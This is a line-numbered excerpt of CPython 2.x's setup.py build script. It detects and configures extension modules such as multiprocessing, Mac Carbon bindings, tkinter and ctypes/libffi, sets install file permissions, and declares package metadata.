1216 | include_dirs = [expatinc],
1217 | sources = ['_elementtree.c'],
1218 | ))
1219 | else:
1220 | missing.append('_elementtree')
1221 |
1222 | # Hye-Shik Chang's CJKCodecs modules.
1223 | if have_unicode:
1224 | exts.append(Extension('_multibytecodec',
1225 | ['cjkcodecs/multibytecodec.c']))
1226 | for loc in ('kr', 'jp', 'cn', 'tw', 'hk', 'iso2022'):
1227 | exts.append(Extension('_codecs_%s' % loc,
1228 | ['cjkcodecs/_codecs_%s.c' % loc]))
1229 | else:
1230 | missing.append('_multibytecodec')
1231 | for loc in ('kr', 'jp', 'cn', 'tw', 'hk', 'iso2022'):
1232 | missing.append('_codecs_%s' % loc)
1233 |
1234 | # Dynamic loading module
1235 | if sys.maxint == 0x7fffffff:
1236 | # This requires sizeof(int) == sizeof(long) == sizeof(char*)
1237 | dl_inc = find_file('dlfcn.h', [], inc_dirs)
1238 | if (dl_inc is not None) and (platform not in ['atheos']):
1239 | exts.append( Extension('dl', ['dlmodule.c']) )
1240 | else:
1241 | missing.append('dl')
1242 | else:
1243 | missing.append('dl')
1244 |
1245 | # Thomas Heller's _ctypes module
1246 | self.detect_ctypes(inc_dirs, lib_dirs)
1247 |
1248 | # Richard Oudkerk's multiprocessing module
1249 | if platform == 'win32': # Windows
1250 | macros = dict()
1251 | libraries = ['ws2_32']
1252 |
1253 | elif platform == 'darwin': # Mac OSX
1254 | macros = dict(
1255 | HAVE_SEM_OPEN=1,
1256 | HAVE_SEM_TIMEDWAIT=0,
1257 | HAVE_FD_TRANSFER=1,
1258 | HAVE_BROKEN_SEM_GETVALUE=1
1259 | )
1260 | libraries = []
1261 |
1262 | elif platform == 'cygwin': # Cygwin
1263 | macros = dict(
1264 | HAVE_SEM_OPEN=1,
1265 | HAVE_SEM_TIMEDWAIT=1,
1266 | HAVE_FD_TRANSFER=0,
1267 | HAVE_BROKEN_SEM_UNLINK=1
1268 | )
1269 | libraries = []
1270 |
1271 | elif platform in ('freebsd4', 'freebsd5', 'freebsd6', 'freebsd7', 'freebsd8'):
1272 | # FreeBSD's P1003.1b semaphore support is very experimental
1273 | # and has many known problems. (as of June 2008)
1274 | macros = dict( # FreeBSD
1275 | HAVE_SEM_OPEN=0,
1276 | HAVE_SEM_TIMEDWAIT=0,
1277 | HAVE_FD_TRANSFER=1,
1278 | )
1279 | libraries = []
1280 |
1281 | elif platform.startswith('openbsd'):
1282 | macros = dict( # OpenBSD
1283 | HAVE_SEM_OPEN=0, # Not implemented
1284 | HAVE_SEM_TIMEDWAIT=0,
1285 | HAVE_FD_TRANSFER=1,
1286 | )
1287 | libraries = []
1288 |
1289 | elif platform.startswith('netbsd'):
1290 | macros = dict( # at least NetBSD 5
1291 | HAVE_SEM_OPEN=1,
1292 | HAVE_SEM_TIMEDWAIT=0,
1293 | HAVE_FD_TRANSFER=1,
1294 | HAVE_BROKEN_SEM_GETVALUE=1
1295 | )
1296 | libraries = []
1297 |
1298 | else: # Linux and other unices
1299 | macros = dict(
1300 | HAVE_SEM_OPEN=1,
1301 | HAVE_SEM_TIMEDWAIT=1,
1302 | HAVE_FD_TRANSFER=1
1303 | )
1304 | libraries = ['rt']
1305 |
1306 | if platform == 'win32':
1307 | multiprocessing_srcs = [ '_multiprocessing/multiprocessing.c',
1308 | '_multiprocessing/semaphore.c',
1309 | '_multiprocessing/pipe_connection.c',
1310 | '_multiprocessing/socket_connection.c',
1311 | '_multiprocessing/win32_functions.c'
1312 | ]
1313 |
1314 | else:
1315 | multiprocessing_srcs = [ '_multiprocessing/multiprocessing.c',
1316 | '_multiprocessing/socket_connection.c'
1317 | ]
1318 |
1319 | if macros.get('HAVE_SEM_OPEN', False):
1320 | multiprocessing_srcs.append('_multiprocessing/semaphore.c')
1321 |
1322 | exts.append ( Extension('_multiprocessing', multiprocessing_srcs,
1323 | define_macros=macros.items(),
1324 | include_dirs=["Modules/_multiprocessing"]))
1325 | # End multiprocessing
1326 |
1327 |
1328 | # Platform-specific libraries
1329 | if platform == 'linux2':
1330 | # Linux-specific modules
1331 | exts.append( Extension('linuxaudiodev', ['linuxaudiodev.c']) )
1332 | else:
1333 | missing.append('linuxaudiodev')
1334 |
1335 | if platform in ('linux2', 'freebsd4', 'freebsd5', 'freebsd6',
1336 | 'freebsd7', 'freebsd8'):
1337 | exts.append( Extension('ossaudiodev', ['ossaudiodev.c']) )
1338 | else:
1339 | missing.append('ossaudiodev')
1340 |
1341 | if platform == 'sunos5':
1342 | # SunOS specific modules
1343 | exts.append( Extension('sunaudiodev', ['sunaudiodev.c']) )
1344 | else:
1345 | missing.append('sunaudiodev')
1346 |
1347 | if platform == 'darwin' and ("--disable-toolbox-glue" not in
1348 | sysconfig.get_config_var("CONFIG_ARGS")):
1349 |
1350 | if os.uname()[2] > '8.':
1351 | # We're on Mac OS X 10.4 or later, the compiler should
1352 | # support '-Wno-deprecated-declarations'. This will
1353 | # surpress deprecation warnings for the Carbon extensions,
1354 | # these extensions wrap the Carbon APIs and even those
1355 | # parts that are deprecated.
1356 | carbon_extra_compile_args = ['-Wno-deprecated-declarations']
1357 | else:
1358 | carbon_extra_compile_args = []
1359 |
1360 | # Mac OS X specific modules.
1361 | def macSrcExists(name1, name2=''):
1362 | if not name1:
1363 | return None
1364 | names = (name1,)
1365 | if name2:
1366 | names = (name1, name2)
1367 | path = os.path.join(srcdir, 'Mac', 'Modules', *names)
1368 | return os.path.exists(path)
1369 |
1370 | def addMacExtension(name, kwds, extra_srcs=[]):
1371 | dirname = ''
1372 | if name[0] == '_':
1373 | dirname = name[1:].lower()
1374 | cname = name + '.c'
1375 | cmodulename = name + 'module.c'
1376 | # Check for NNN.c, NNNmodule.c, _nnn/NNN.c, _nnn/NNNmodule.c
1377 | if macSrcExists(cname):
1378 | srcs = [cname]
1379 | elif macSrcExists(cmodulename):
1380 | srcs = [cmodulename]
1381 | elif macSrcExists(dirname, cname):
1382 | # XXX(nnorwitz): If all the names ended with module, we
1383 | # wouldn't need this condition. ibcarbon is the only one.
1384 | srcs = [os.path.join(dirname, cname)]
1385 | elif macSrcExists(dirname, cmodulename):
1386 | srcs = [os.path.join(dirname, cmodulename)]
1387 | else:
1388 | raise RuntimeError("%s not found" % name)
1389 |
1390 | # Here's the whole point: add the extension with sources
1391 | exts.append(Extension(name, srcs + extra_srcs, **kwds))
1392 |
1393 | # Core Foundation
1394 | core_kwds = {'extra_compile_args': carbon_extra_compile_args,
1395 | 'extra_link_args': ['-framework', 'CoreFoundation'],
1396 | }
1397 | addMacExtension('_CF', core_kwds, ['cf/pycfbridge.c'])
1398 | addMacExtension('autoGIL', core_kwds)
1399 |
1400 | # Carbon
1401 | carbon_kwds = {'extra_compile_args': carbon_extra_compile_args,
1402 | 'extra_link_args': ['-framework', 'Carbon'],
1403 | }
1404 | CARBON_EXTS = ['ColorPicker', 'gestalt', 'MacOS', 'Nav',
1405 | 'OSATerminology', 'icglue',
1406 | # All these are in subdirs
1407 | '_AE', '_AH', '_App', '_CarbonEvt', '_Cm', '_Ctl',
1408 | '_Dlg', '_Drag', '_Evt', '_File', '_Folder', '_Fm',
1409 | '_Help', '_Icn', '_IBCarbon', '_List',
1410 | '_Menu', '_Mlte', '_OSA', '_Res', '_Qd', '_Qdoffs',
1411 | '_Scrap', '_Snd', '_TE',
1412 | ]
1413 | for name in CARBON_EXTS:
1414 | addMacExtension(name, carbon_kwds)
1415 |
1416 | # Workaround for a bug in the version of gcc shipped with Xcode 3.
1417 | # The _Win extension should build just like the other Carbon extensions, but
1418 | # this actually results in a hard crash of the linker.
1419 | #
1420 | if '-arch ppc64' in cflags and '-arch ppc' in cflags:
1421 | win_kwds = {'extra_compile_args': carbon_extra_compile_args + ['-arch', 'i386', '-arch', 'ppc'],
1422 | 'extra_link_args': ['-framework', 'Carbon', '-arch', 'i386', '-arch', 'ppc'],
1423 | }
1424 | addMacExtension('_Win', win_kwds)
1425 | else:
1426 | addMacExtension('_Win', carbon_kwds)
1427 |
1428 |
1429 | # Application Services & QuickTime
1430 | app_kwds = {'extra_compile_args': carbon_extra_compile_args,
1431 | 'extra_link_args': ['-framework','ApplicationServices'],
1432 | }
1433 | addMacExtension('_Launch', app_kwds)
1434 | addMacExtension('_CG', app_kwds)
1435 |
1436 | exts.append( Extension('_Qt', ['qt/_Qtmodule.c'],
1437 | extra_compile_args=carbon_extra_compile_args,
1438 | extra_link_args=['-framework', 'QuickTime',
1439 | '-framework', 'Carbon']) )
1440 |
1441 |
1442 | self.extensions.extend(exts)
1443 |
1444 | # Call the method for detecting whether _tkinter can be compiled
1445 | self.detect_tkinter(inc_dirs, lib_dirs)
1446 |
1447 | if '_tkinter' not in [e.name for e in self.extensions]:
1448 | missing.append('_tkinter')
1449 |
1450 | return missing
1451 |
1452 | def detect_tkinter_darwin(self, inc_dirs, lib_dirs):
1453 | # The _tkinter module, using frameworks. Since frameworks are quite
1454 | # different the UNIX search logic is not sharable.
1455 | from os.path import join, exists
1456 | framework_dirs = [
1457 | '/Library/Frameworks',
1458 | '/System/Library/Frameworks/',
1459 | join(os.getenv('HOME'), '/Library/Frameworks')
1460 | ]
1461 |
1462 | # Find the directory that contains the Tcl.framework and Tk.framework
1463 | # bundles.
1464 | # XXX distutils should support -F!
1465 | for F in framework_dirs:
1466 | # both Tcl.framework and Tk.framework should be present
1467 | for fw in 'Tcl', 'Tk':
1468 | if not exists(join(F, fw + '.framework')):
1469 | break
1470 | else:
1471 | # ok, F is now directory with both frameworks. Continure
1472 | # building
1473 | break
1474 | else:
1475 | # Tk and Tcl frameworks not found. Normal "unix" tkinter search
1476 | # will now resume.
1477 | return 0
1478 |
1479 | # For 8.4a2, we must add -I options that point inside the Tcl and Tk
1480 | # frameworks. In later release we should hopefully be able to pass
1481 | # the -F option to gcc, which specifies a framework lookup path.
1482 | #
1483 | include_dirs = [
1484 | join(F, fw + '.framework', H)
1485 | for fw in 'Tcl', 'Tk'
1486 | for H in 'Headers', 'Versions/Current/PrivateHeaders'
1487 | ]
1488 |
1489 | # For 8.4a2, the X11 headers are not included. Rather than include a
1490 | # complicated search, this is a hard-coded path. It could bail out
1491 | # if X11 libs are not found...
1492 | include_dirs.append('/usr/X11R6/include')
1493 | frameworks = ['-framework', 'Tcl', '-framework', 'Tk']
1494 |
1495 | # All existing framework builds of Tcl/Tk don't support 64-bit
1496 | # architectures.
1497 | cflags = sysconfig.get_config_vars('CFLAGS')[0]
1498 | archs = re.findall('-arch\s+(\w+)', cflags)
1499 | if 'x86_64' in archs or 'ppc64' in archs:
1500 | try:
1501 | archs.remove('x86_64')
1502 | except ValueError:
1503 | pass
1504 | try:
1505 | archs.remove('ppc64')
1506 | except ValueError:
1507 | pass
1508 |
1509 | for a in archs:
1510 | frameworks.append('-arch')
1511 | frameworks.append(a)
1512 |
1513 | ext = Extension('_tkinter', ['_tkinter.c', 'tkappinit.c'],
1514 | define_macros=[('WITH_APPINIT', 1)],
1515 | include_dirs = include_dirs,
1516 | libraries = [],
1517 | extra_compile_args = frameworks[2:],
1518 | extra_link_args = frameworks,
1519 | )
1520 | self.extensions.append(ext)
1521 | return 1
1522 |
1523 |
1524 | def detect_tkinter(self, inc_dirs, lib_dirs):
1525 | # The _tkinter module.
1526 |
1527 | # Rather than complicate the code below, detecting and building
1528 | # AquaTk is a separate method. Only one Tkinter will be built on
1529 | # Darwin - either AquaTk, if it is found, or X11 based Tk.
1530 | platform = self.get_platform()
1531 | if (platform == 'darwin' and
1532 | self.detect_tkinter_darwin(inc_dirs, lib_dirs)):
1533 | return
1534 |
1535 | # Assume we haven't found any of the libraries or include files
1536 | # The versions with dots are used on Unix, and the versions without
1537 | # dots on Windows, for detection by cygwin.
1538 | tcllib = tklib = tcl_includes = tk_includes = None
1539 | for version in ['8.5', '85', '8.4', '84', '8.3', '83', '8.2',
1540 | '82', '8.1', '81', '8.0', '80']:
1541 | tklib = self.compiler.find_library_file(lib_dirs, 'tk' + version)
1542 | tcllib = self.compiler.find_library_file(lib_dirs, 'tcl' + version)
1543 | if tklib and tcllib:
1544 | # Exit the loop when we've found the Tcl/Tk libraries
1545 | break
1546 |
1547 | # Now check for the header files
1548 | if tklib and tcllib:
1549 | # Check for the include files on Debian and {Free,Open}BSD, where
1550 | # they're put in /usr/include/{tcl,tk}X.Y
1551 | dotversion = version
1552 | if '.' not in dotversion and "bsd" in sys.platform.lower():
1553 | # OpenBSD and FreeBSD use Tcl/Tk library names like libtcl83.a,
1554 | # but the include subdirs are named like .../include/tcl8.3.
1555 | dotversion = dotversion[:-1] + '.' + dotversion[-1]
1556 | tcl_include_sub = []
1557 | tk_include_sub = []
1558 | for dir in inc_dirs:
1559 | tcl_include_sub += [dir + os.sep + "tcl" + dotversion]
1560 | tk_include_sub += [dir + os.sep + "tk" + dotversion]
1561 | tk_include_sub += tcl_include_sub
1562 | tcl_includes = find_file('tcl.h', inc_dirs, tcl_include_sub)
1563 | tk_includes = find_file('tk.h', inc_dirs, tk_include_sub)
1564 |
1565 | if (tcllib is None or tklib is None or
1566 | tcl_includes is None or tk_includes is None):
1567 | self.announce("INFO: Can't locate Tcl/Tk libs and/or headers", 2)
1568 | return
1569 |
1570 | # OK... everything seems to be present for Tcl/Tk.
1571 |
1572 | include_dirs = [] ; libs = [] ; defs = [] ; added_lib_dirs = []
1573 | for dir in tcl_includes + tk_includes:
1574 | if dir not in include_dirs:
1575 | include_dirs.append(dir)
1576 |
1577 | # Check for various platform-specific directories
1578 | if platform == 'sunos5':
1579 | include_dirs.append('/usr/openwin/include')
1580 | added_lib_dirs.append('/usr/openwin/lib')
1581 | elif os.path.exists('/usr/X11R6/include'):
1582 | include_dirs.append('/usr/X11R6/include')
1583 | added_lib_dirs.append('/usr/X11R6/lib64')
1584 | added_lib_dirs.append('/usr/X11R6/lib')
1585 | elif os.path.exists('/usr/X11R5/include'):
1586 | include_dirs.append('/usr/X11R5/include')
1587 | added_lib_dirs.append('/usr/X11R5/lib')
1588 | else:
1589 | # Assume default location for X11
1590 | include_dirs.append('/usr/X11/include')
1591 | added_lib_dirs.append('/usr/X11/lib')
1592 |
1593 | # If Cygwin, then verify that X is installed before proceeding
1594 | if platform == 'cygwin':
1595 | x11_inc = find_file('X11/Xlib.h', [], include_dirs)
1596 | if x11_inc is None:
1597 | return
1598 |
1599 | # Check for BLT extension
1600 | if self.compiler.find_library_file(lib_dirs + added_lib_dirs,
1601 | 'BLT8.0'):
1602 | defs.append( ('WITH_BLT', 1) )
1603 | libs.append('BLT8.0')
1604 | elif self.compiler.find_library_file(lib_dirs + added_lib_dirs,
1605 | 'BLT'):
1606 | defs.append( ('WITH_BLT', 1) )
1607 | libs.append('BLT')
1608 |
1609 | # Add the Tcl/Tk libraries
1610 | libs.append('tk'+ version)
1611 | libs.append('tcl'+ version)
1612 |
1613 | if platform in ['aix3', 'aix4']:
1614 | libs.append('ld')
1615 |
1616 | # Finally, link with the X11 libraries (not appropriate on cygwin)
1617 | if platform != "cygwin":
1618 | libs.append('X11')
1619 |
1620 | ext = Extension('_tkinter', ['_tkinter.c', 'tkappinit.c'],
1621 | define_macros=[('WITH_APPINIT', 1)] + defs,
1622 | include_dirs = include_dirs,
1623 | libraries = libs,
1624 | library_dirs = added_lib_dirs,
1625 | )
1626 | self.extensions.append(ext)
1627 |
1628 | ## # Uncomment these lines if you want to play with xxmodule.c
1629 | ## ext = Extension('xx', ['xxmodule.c'])
1630 | ## self.extensions.append(ext)
1631 |
1632 | # XXX handle these, but how to detect?
1633 | # *** Uncomment and edit for PIL (TkImaging) extension only:
1634 | # -DWITH_PIL -I../Extensions/Imaging/libImaging tkImaging.c \
1635 | # *** Uncomment and edit for TOGL extension only:
1636 | # -DWITH_TOGL togl.c \
1637 | # *** Uncomment these for TOGL extension only:
1638 | # -lGL -lGLU -lXext -lXmu \
1639 |
1640 | def configure_ctypes_darwin(self, ext):
1641 | # Darwin (OS X) uses preconfigured files, in
1642 | # the Modules/_ctypes/libffi_osx directory.
1643 | (srcdir,) = sysconfig.get_config_vars('srcdir')
1644 | ffi_srcdir = os.path.abspath(os.path.join(srcdir, 'Modules',
1645 | '_ctypes', 'libffi_osx'))
1646 | sources = [os.path.join(ffi_srcdir, p)
1647 | for p in ['ffi.c',
1648 | 'x86/darwin64.S',
1649 | 'x86/x86-darwin.S',
1650 | 'x86/x86-ffi_darwin.c',
1651 | 'x86/x86-ffi64.c',
1652 | 'powerpc/ppc-darwin.S',
1653 | 'powerpc/ppc-darwin_closure.S',
1654 | 'powerpc/ppc-ffi_darwin.c',
1655 | 'powerpc/ppc64-darwin_closure.S',
1656 | ]]
1657 |
1658 | # Add .S (preprocessed assembly) to C compiler source extensions.
1659 | self.compiler.src_extensions.append('.S')
1660 |
1661 | include_dirs = [os.path.join(ffi_srcdir, 'include'),
1662 | os.path.join(ffi_srcdir, 'powerpc')]
1663 | ext.include_dirs.extend(include_dirs)
1664 | ext.sources.extend(sources)
1665 | return True
1666 |
1667 | def configure_ctypes(self, ext):
1668 | if not self.use_system_libffi:
1669 | if sys.platform == 'darwin':
1670 | return self.configure_ctypes_darwin(ext)
1671 |
1672 | (srcdir,) = sysconfig.get_config_vars('srcdir')
1673 | ffi_builddir = os.path.join(self.build_temp, 'libffi')
1674 | ffi_srcdir = os.path.abspath(os.path.join(srcdir, 'Modules',
1675 | '_ctypes', 'libffi'))
1676 | ffi_configfile = os.path.join(ffi_builddir, 'fficonfig.py')
1677 |
1678 | from distutils.dep_util import newer_group
1679 |
1680 | config_sources = [os.path.join(ffi_srcdir, fname)
1681 | for fname in os.listdir(ffi_srcdir)
1682 | if os.path.isfile(os.path.join(ffi_srcdir, fname))]
1683 | if self.force or newer_group(config_sources,
1684 | ffi_configfile):
1685 | from distutils.dir_util import mkpath
1686 | mkpath(ffi_builddir)
1687 | config_args = []
1688 |
1689 | # Pass empty CFLAGS because we'll just append the resulting
1690 | # CFLAGS to Python's; -g or -O2 is to be avoided.
1691 | cmd = "cd %s && env CFLAGS='' '%s/configure' %s" \
1692 | % (ffi_builddir, ffi_srcdir, " ".join(config_args))
1693 |
1694 | res = os.system(cmd)
1695 | if res or not os.path.exists(ffi_configfile):
1696 | print "Failed to configure _ctypes module"
1697 | return False
1698 |
1699 | fficonfig = {}
1700 | execfile(ffi_configfile, globals(), fficonfig)
1701 | ffi_srcdir = os.path.join(fficonfig['ffi_srcdir'], 'src')
1702 |
1703 | # Add .S (preprocessed assembly) to C compiler source extensions.
1704 | self.compiler.src_extensions.append('.S')
1705 |
1706 | include_dirs = [os.path.join(ffi_builddir, 'include'),
1707 | ffi_builddir, ffi_srcdir]
1708 | extra_compile_args = fficonfig['ffi_cflags'].split()
1709 |
1710 | ext.sources.extend(fficonfig['ffi_sources'])
1711 | ext.include_dirs.extend(include_dirs)
1712 | ext.extra_compile_args.extend(extra_compile_args)
1713 | return True
1714 |
1715 | def detect_ctypes(self, inc_dirs, lib_dirs):
1716 | self.use_system_libffi = False
1717 | include_dirs = []
1718 | extra_compile_args = []
1719 | extra_link_args = []
1720 | sources = ['_ctypes/_ctypes.c',
1721 | '_ctypes/callbacks.c',
1722 | '_ctypes/callproc.c',
1723 | '_ctypes/stgdict.c',
1724 | '_ctypes/cfield.c',
1725 | '_ctypes/malloc_closure.c']
1726 | depends = ['_ctypes/ctypes.h']
1727 |
1728 | if sys.platform == 'darwin':
1729 | sources.append('_ctypes/darwin/dlfcn_simple.c')
1730 | extra_compile_args.append('-DMACOSX')
1731 | include_dirs.append('_ctypes/darwin')
1732 | # XXX Is this still needed?
1733 | ## extra_link_args.extend(['-read_only_relocs', 'warning'])
1734 |
1735 | elif sys.platform == 'sunos5':
1736 | # XXX This shouldn't be necessary; it appears that some
1737 | # of the assembler code is non-PIC (i.e. it has relocations
1738 | # when it shouldn't. The proper fix would be to rewrite
1739 | # the assembler code to be PIC.
1740 | # This only works with GCC; the Sun compiler likely refuses
1741 | # this option. If you want to compile ctypes with the Sun
1742 | # compiler, please research a proper solution, instead of
1743 | # finding some -z option for the Sun compiler.
1744 | extra_link_args.append('-mimpure-text')
1745 |
1746 | elif sys.platform.startswith('hp-ux'):
1747 | extra_link_args.append('-fPIC')
1748 |
1749 | ext = Extension('_ctypes',
1750 | include_dirs=include_dirs,
1751 | extra_compile_args=extra_compile_args,
1752 | extra_link_args=extra_link_args,
1753 | libraries=[],
1754 | sources=sources,
1755 | depends=depends)
1756 | ext_test = Extension('_ctypes_test',
1757 | sources=['_ctypes/_ctypes_test.c'])
1758 | self.extensions.extend([ext, ext_test])
1759 |
1760 | if not '--with-system-ffi' in sysconfig.get_config_var("CONFIG_ARGS"):
1761 | return
1762 |
1763 | if sys.platform == 'darwin':
1764 | # OS X 10.5 comes with libffi.dylib; the include files are
1765 | # in /usr/include/ffi
1766 | inc_dirs.append('/usr/include/ffi')
1767 |
1768 | ffi_inc = find_file('ffi.h', [], inc_dirs)
1769 | if ffi_inc is not None:
1770 | ffi_h = ffi_inc[0] + '/ffi.h'
1771 | fp = open(ffi_h)
1772 | while 1:
1773 | line = fp.readline()
1774 | if not line:
1775 | ffi_inc = None
1776 | break
1777 | if line.startswith('#define LIBFFI_H'):
1778 | break
1779 | ffi_lib = None
1780 | if ffi_inc is not None:
1781 | for lib_name in ('ffi_convenience', 'ffi_pic', 'ffi'):
1782 | if (self.compiler.find_library_file(lib_dirs, lib_name)):
1783 | ffi_lib = lib_name
1784 | break
1785 |
1786 | if ffi_inc and ffi_lib:
1787 | ext.include_dirs.extend(ffi_inc)
1788 | ext.libraries.append(ffi_lib)
1789 | self.use_system_libffi = True
1790 |
1791 |
1792 | class PyBuildInstall(install):
1793 | # Suppress the warning about installation into the lib_dynload
1794 | # directory, which is not in sys.path when running Python during
1795 | # installation:
1796 | def initialize_options (self):
1797 | install.initialize_options(self)
1798 | self.warn_dir=0
1799 |
1800 | class PyBuildInstallLib(install_lib):
1801 | # Do exactly what install_lib does but make sure correct access modes get
1802 | # set on installed directories and files. All installed files with get
1803 | # mode 644 unless they are a shared library in which case they will get
1804 | # mode 755. All installed directories will get mode 755.
1805 |
1806 | so_ext = sysconfig.get_config_var("SO")
1807 |
1808 | def install(self):
1809 | outfiles = install_lib.install(self)
1810 | self.set_file_modes(outfiles, 0644, 0755)
1811 | self.set_dir_modes(self.install_dir, 0755)
1812 | return outfiles
1813 |
1814 | def set_file_modes(self, files, defaultMode, sharedLibMode):
1815 | if not self.is_chmod_supported(): return
1816 | if not files: return
1817 |
1818 | for filename in files:
1819 | if os.path.islink(filename): continue
1820 | mode = defaultMode
1821 | if filename.endswith(self.so_ext): mode = sharedLibMode
1822 | log.info("changing mode of %s to %o", filename, mode)
1823 | if not self.dry_run: os.chmod(filename, mode)
1824 |
1825 | def set_dir_modes(self, dirname, mode):
1826 | if not self.is_chmod_supported(): return
1827 | os.path.walk(dirname, self.set_dir_modes_visitor, mode)
1828 |
1829 | def set_dir_modes_visitor(self, mode, dirname, names):
1830 | if os.path.islink(dirname): return
1831 | log.info("changing mode of %s to %o", dirname, mode)
1832 | if not self.dry_run: os.chmod(dirname, mode)
1833 |
1834 | def is_chmod_supported(self):
1835 | return hasattr(os, 'chmod')
1836 |
1837 | SUMMARY = """
1838 | Python is an interpreted, interactive, object-oriented programming
1839 | language. It is often compared to Tcl, Perl, Scheme or Java.
1840 |
1841 | Python combines remarkable power with very clear syntax. It has
1842 | modules, classes, exceptions, very high level dynamic data types, and
1843 | dynamic typing. There are interfaces to many system calls and
1844 | libraries, as well as to various windowing systems (X11, Motif, Tk,
1845 | Mac, MFC). New built-in modules are easily written in C or C++. Python
1846 | is also usable as an extension language for applications that need a
1847 | programmable interface.
1848 |
1849 | The Python implementation is portable: it runs on many brands of UNIX,
1850 | on Windows, DOS, OS/2, Mac, Amiga... If your favorite system isn't
1851 | listed here, it may still be supported, if there's a C compiler for
1852 | it. Ask around on comp.lang.python -- or just try compiling Python
1853 | yourself.
1854 | """
1855 |
1856 | CLASSIFIERS = """
1857 | Development Status :: 6 - Mature
1858 | License :: OSI Approved :: Python Software Foundation License
1859 | Natural Language :: English
1860 | Programming Language :: C
1861 | Programming Language :: Python
1862 | Topic :: Software Development
1863 | """
1864 |
1865 | def main():
1866 | # turn off warnings when deprecated modules are imported
1867 | import warnings
1868 | warnings.filterwarnings("ignore",category=DeprecationWarning)
1869 | setup(# PyPI Metadata (PEP 301)
1870 | name = "Python",
1871 | version = sys.version.split()[0],
1872 | url = "http://www.python.org/%s" % sys.version[:3],
1873 | maintainer = "Guido van Rossum and the Python community",
1874 | maintainer_email = "python-dev@python.org",
1875 | description = "A high-level object-oriented programming language",
1876 | long_description = SUMMARY.strip(),
1877 | license = "PSF license",
1878 | classifiers = filter(None, CLASSIFIERS.split("\n")),
1879 | platforms = ["Many"],
1880 |
1881 | # Build info
1882 | cmdclass = {'build_ext':PyBuildExt, 'install':PyBuildInstall,
1883 | 'install_lib':PyBuildInstallLib},
1884 | # The struct module is defined here, because build_ext won't be
1885 | # called unless there's at least one extension module defined.
1886 | ext_modules=[Extension('_struct', ['_struct.c'])],
1887 |
1888 | # Scripts to install
1889 | scripts = ['Tools/scripts/pydoc', 'Tools/scripts/idle',
1890 | 'Tools/scripts/2to3',
1891 | 'Lib/smtpd.py']
1892 | )
1893 |
1894 | # --install-platlib
1895 | if __name__ == '__main__':
1896 | main()
1897 |
--------------------------------------------------------------------------------